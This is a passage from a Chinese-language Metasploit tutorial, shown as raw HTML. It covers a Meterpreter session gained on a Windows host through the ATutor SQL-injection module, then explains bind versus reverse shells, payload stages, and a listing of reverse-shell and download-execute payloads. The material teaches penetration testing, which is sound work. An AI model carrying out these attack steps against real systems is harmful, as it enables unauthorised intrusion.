class=\"hljs-string\">opened<\/span> <span class=\"hljs-string\">(192.168.177.143:4444<\/span> <span class=\"hljs-string\">-&gt;<\/span> <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.139<\/span><span class=\"hljs-string\">:50088)<\/span> <span class=\"hljs-string\">at<\/span> <span class=\"hljs-number\">2019-04-28 13:53:36<\/span> <span class=\"hljs-string\">+0800<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-type\">!]<\/span> <span class=\"hljs-string\">This<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">may<\/span> <span class=\"hljs-string\">require<\/span> <span class=\"hljs-string\">manual<\/span> <span class=\"hljs-string\">cleanup<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">'ytux.php'<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">target<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[<span class=\"hljs-type\">!]<\/span> <span class=\"hljs-string\">This<\/span> <span class=\"hljs-string\">exploit<\/span> <span class=\"hljs-string\">may<\/span> <span class=\"hljs-string\">require<\/span> <span class=\"hljs-string\">manual<\/span> <span class=\"hljs-string\">cleanup<\/span> <span class=\"hljs-string\">of<\/span> <span class=\"hljs-string\">'\/var\/content\/module\/zyq\/ytux.php'<\/span> <span class=\"hljs-string\">on<\/span> <span class=\"hljs-string\">the<\/span> <span class=\"hljs-string\">target<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>\u6839\u636e\u5bc6\u7801\u590d\u6742\u5ea6\u4e0d\u540c\uff0c\u6240\u9700\u65f6\u957f\u4e5f\u4e0d\u540c\u3002\u653b\u51fb\u6210\u529f\u540e\uff0c\u83b7\u53d6\u4e86<code>shell<\/code><\/p>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">meterpreter<\/span> <span class=\"hljs-string\">&gt; getuid<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Server<\/span> <span class=\"hljs-string\">username: Administrator (0)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">meterpreter<\/span> <span class=\"hljs-string\">&gt; sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Computer<\/span> : <span class=\"hljs-string\">WIN-BGKRU85VR4H<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">OS<\/span> : <span class=\"hljs-string\">Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Meterpreter<\/span> : <span class=\"hljs-string\">php\/windows<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">meterpreter<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-attr\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable properties\"><\/code><\/pre>\n<h4 class=\"heading\">3\u3001shell\u7c7b\u578b<\/h4>\n<p>\u5728\u8fdb\u884c\u4e0b\u4e00\u8282\u5185\u5bb9\u7684\u5b66\u4e60\u4e4b\u524d\uff0c\u6211\u4eec\u5148\u6765\u8ba8\u8bba\u4e00\u4e9b\u53ef\u7528<code>shell<\/code>\u7684\u7c7b\u578b\u3002<code>shell<\/code>\u5927\u4f53\u4e0a\u5206\u4e3a\u4e24\u79cd\uff0c\u4e00\u79cd\u662f<code>bind shell<\/code>\u4e00\u79cd\u662f<code>reverse shjell<\/code>\u3002<\/p>\n<p><code>bind<\/code>shell \u53c8\u53eb\u6b63\u5411\u8fde\u63a5<code>shell<\/code>\u3002\u662f\u6307\u7a0b\u5e8f\u5728\u76ee\u6807\u673a\u672c\u5730\u7aef\u53e3\u4e0a\u76d1\u542c\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u8fde\u63a5\u5230\u76d1\u542c\u7aef\u53e3\u3002<code>bind shell<\/code>\u975e\u5e38\u9002\u5408\u672c\u5730\u6f0f\u6d1e\uff0c\u6bd4\u5982\u5f53\u4f60\u5df2\u7ecf\u901a\u8fc7\u9493\u9c7c\u653b\u51fb\u6210\u529f\u5371\u5bb3\u4e86\u76ee\u6807\u8ba1\u7b97\u673a\uff0c\u5e76\u5e0c\u671b\u5229\u7528\u672c\u5730\u670d\u52a1\u63d0\u6743\u7684\u65f6\u5019\u3002\u4f46\u662f\u5b83\u4e0d\u9002\u5408\u8fdc\u7a0b\u653b\u51fb\u573a\u666f\u3002\u56e0\u4e3a\u901a\u5e38\u6765\u8bf4\u76ee\u6807\u4f4d\u4e8e\u9632\u706b\u5899\u540e\u9762\u3002<\/p>\n<p>\u6240\u4ee5\u5927\u90e8\u5206\u65f6\u5019\uff0c\u6211\u4eec\u66f4\u591a\u7684\u4f7f\u7528<code>reverse shell<\/code>\uff0c\u53c8\u79f0\u53cd\u5411<code>shell<\/code>\u4f5c\u4e3a\u6211\u4eec\u7684\u6709\u6548\u653b\u51fb\u8f7d\u8377\u3002\u53cd\u5411<code>shell<\/code>\u662f\u5728\u653b\u51fb\u8005\u4e0a\u76d1\u542c\u7aef\u53e3\uff0c\u653b\u51fb\u7a0b\u5e8f\u5728\u76ee\u6807\u673a\u4e0a\u8fd0\u884c\u540e\u4e3b\u52a8\u8fde\u63a5\u5230\u653b\u51fb\u8005\u76d1\u542c\u7684\u7aef\u53e3\u3002\u7531\u4e8e\u9632\u706b\u5899\u5927\u591a\u6570\u65f6\u5019\u53ea\u9650\u5236\u5165\u7ad9\u89c4\u5219\u3002\u56e0\u6b64\u53cd\u5411shell\u66f4\u5bb9\u6613\u7ed5\u8fc7\u9632\u706b\u5899\u3002<\/p>\n<p>Payloads<\/p>\n<p><code>Metasploit<\/code>\u4e2d\u7531\u4e09\u79cd\u4e0d\u540c\u7c7b\u578b\u7684<code>payload<\/code>\u6a21\u5757\uff0c\u5206\u522b\u662f\uff1a<code>singles<\/code>\u3001<code>stagers<\/code>\u548c<code>stages<\/code>\u3002<\/p>\n<p><code>Singles<\/code>\uff1a\u72ec\u7acb\u8f7d\u8377\uff0c\u53ef\u76f4\u63a5\u690d\u5165\u76ee\u6807\u7cfb\u7edf\u5e76\u6267\u884c\u7684\u7a0b\u5e8f\uff0c\u6bd4\u5982\u00a0<code>shell_bind_tcp<\/code><\/p>\n<p><code>Stagers<\/code>\uff1a\u4f20\u8f93\u5668\u8f7d\u8377\uff0c\u8d1f\u8d23\u5efa\u7acb\u7f51\u7edc\u8fde\u63a5\uff0c\u4e0e<code>stages<\/code>\u8f7d\u8377\u914d\u5408\u4f7f\u7528\u3002\u8fd9\u79cd\u8f7d\u8377\u4f53\u79ef\u5c0f\u4e14\u53ef\u9760<\/p>\n<p><code>Stages<\/code>\uff1a\u4f20\u8f93\u4f53\u8f7d\u8377\uff0c\u5728<code>stagers<\/code>\u5efa\u7acb\u597d\u7a33\u5b9a\u7684\u8fde\u63a5\u4e4b\u540e\uff0c\u63d0\u4f9b\u7684\u9ad8\u7ea7\u529f\u80fd\u3002\u5982\u00a0<code>shell\uff0cmeterpreter\uff0c dllinject, patchupdllinject, upexec,vncinject<\/code>\u7b49\u3002<code>metasploit<\/code>\u4e2d<code>meterpreter<\/code>\u5176\u5b9e\u5c31\u662f\u4e00\u4e2a<code>payload<\/code>\u3002\u5b83\u9700<code>stagers<\/code>\u548c<code>stages<\/code>\u914d\u5408\u4f7f\u7528\u3002<\/p>\n<h5 class=\"heading\">\u51c6\u5907\u5de5\u4f5c<\/h5>\n<p>\u5728\u4e0a\u4e00\u8282\u4e2d\u7684<code>SQL<\/code>\u6ce8\u5165\u4e2d\uff0c\u5df2\u7ecf\u83b7\u5f97\u4e00\u4e2a\u6709\u6548\u7684\u6f0f\u6d1e\u5229\u7528\u3002\u6240\u4ee5\u6211\u4eec\u5c06\u4f7f\u7528\u5b83\u6765\u6d4b\u8bd5\u4e0d\u540c\u7c7b\u578b\u7684<code>payload<\/code><\/p>\n<h5 class=\"heading\">\u600e\u4e48\u505a<\/h5>\n<p>1\u3001\u4f7f\u7528<code>show payloads<\/code>\u547d\u4ee4\u663e\u793a\u53ef\u7528\u7684\u8f7d\u8377\u3002<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span> <span class=\"hljs-string\">show<\/span> <span class=\"hljs-string\">payloads<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">Compatible<\/span> <span class=\"hljs-string\">Payloads<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">===================<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"5\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"6\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-comment\"># Name Disclosure Date Rank Check Description<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"7\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-bullet\">-<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">---------------<\/span> <span class=\"hljs-string\">----<\/span> <span class=\"hljs-string\">-----<\/span> <span class=\"hljs-string\">-----------<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"8\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">1<\/span> <span class=\"hljs-string\">generic\/custom<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Custom<\/span> <span class=\"hljs-string\">Payload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"9\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">2<\/span> <span class=\"hljs-string\">generic\/shell_bind_tcp<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Generic<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Inline<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"10\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">3<\/span> <span class=\"hljs-string\">generic\/shell_reverse_tcp<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">Generic<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Inline<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"11\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">4<\/span> <span class=\"hljs-string\">php\/bind_perl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Perl)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"12\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">5<\/span> <span class=\"hljs-string\">php\/bind_perl_ipv6<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">perl)<\/span> <span class=\"hljs-string\">IPv6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"13\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">6<\/span> <span class=\"hljs-string\">php\/bind_php<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">PHP)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"14\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">7<\/span> <span class=\"hljs-string\">php\/bind_php_ipv6<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">php)<\/span> <span class=\"hljs-string\">IPv6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"15\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">8<\/span> <span class=\"hljs-string\">php\/download_exec<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Executable<\/span> <span class=\"hljs-string\">Download<\/span> <span class=\"hljs-string\">and<\/span> <span class=\"hljs-string\">Execute<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"16\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">9<\/span> <span class=\"hljs-string\">php\/exec<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Execute<\/span> <span class=\"hljs-string\">Command<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"17\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">10<\/span> <span class=\"hljs-string\">php\/meterpreter\/bind_tcp<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Meterpreter,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Stager<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"18\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">11<\/span> <span class=\"hljs-string\">php\/meterpreter\/bind_tcp_ipv6<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Meterpreter,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">IPv6<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"19\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">12<\/span> <span class=\"hljs-string\">php\/meterpreter\/bind_tcp_ipv6_uuid<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Meterpreter,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">IPv6<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-string\">UUID<\/span> <span class=\"hljs-string\">Support<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"20\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">13<\/span> <span class=\"hljs-string\">php\/meterpreter\/bind_tcp_uuid<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Meterpreter,<\/span> <span class=\"hljs-string\">Bind<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Stager<\/span> <span class=\"hljs-string\">with<\/span> <span class=\"hljs-string\">UUID<\/span> <span class=\"hljs-string\">Support<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"21\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">14<\/span> <span class=\"hljs-string\">php\/meterpreter\/reverse_tcp<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Meterpreter,<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Stager<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"22\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">15<\/span> <span class=\"hljs-string\">php\/meterpreter\/reverse_tcp_uuid<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Meterpreter,<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Stager<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"23\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">16<\/span> <span class=\"hljs-string\">php\/meterpreter_reverse_tcp<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Meterpreter,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Inline<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"24\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">17<\/span> <span class=\"hljs-string\">php\/reverse_perl<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Command,<\/span> <span class=\"hljs-string\">Double<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">Connection<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">Perl)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"25\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-number\">18<\/span> <span class=\"hljs-string\">php\/reverse_php<\/span> <span class=\"hljs-string\">normal<\/span> <span class=\"hljs-literal\">No<\/span> <span class=\"hljs-string\">PHP<\/span> <span class=\"hljs-string\">Command<\/span> <span class=\"hljs-string\">Shell,<\/span> <span class=\"hljs-string\">Reverse<\/span> <span class=\"hljs-string\">TCP<\/span> <span class=\"hljs-string\">(via<\/span> <span class=\"hljs-string\">PHP)<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"26\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"27\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(multi\/http\/atutor_sqli)<\/span> <span class=\"hljs-string\">&gt;<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\"><span class=\"hljs-string\">\u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<p>2\u3001\u67e5\u770b\u8f7d\u8377\u7684\u8be6\u7ec6\u4fe1\u606f\uff0c\u4f7f\u7528<code>info &lt;payload&gt;<\/code>\u6307\u4ee4<\/p>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 exploit(multi<span class=\"hljs-regexp\">\/http\/<\/span>atutor_sqli) &gt; info payload<span class=\"hljs-regexp\">\/generic\/<\/span>shell_bind_tcp<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"3\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-attr\">Name:<\/span> Generic Command Shell, Bind TCP Inline <span class=\"hljs-attr\">Module:<\/span> payload<span class=\"hljs-regexp\">\/generic\/<\/span>shell_bind_tcp <span class=\"hljs-attr\">Platform:<\/span> All <span class=\"hljs-attr\">Arch:<\/span> x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, p<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"4\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">hp, 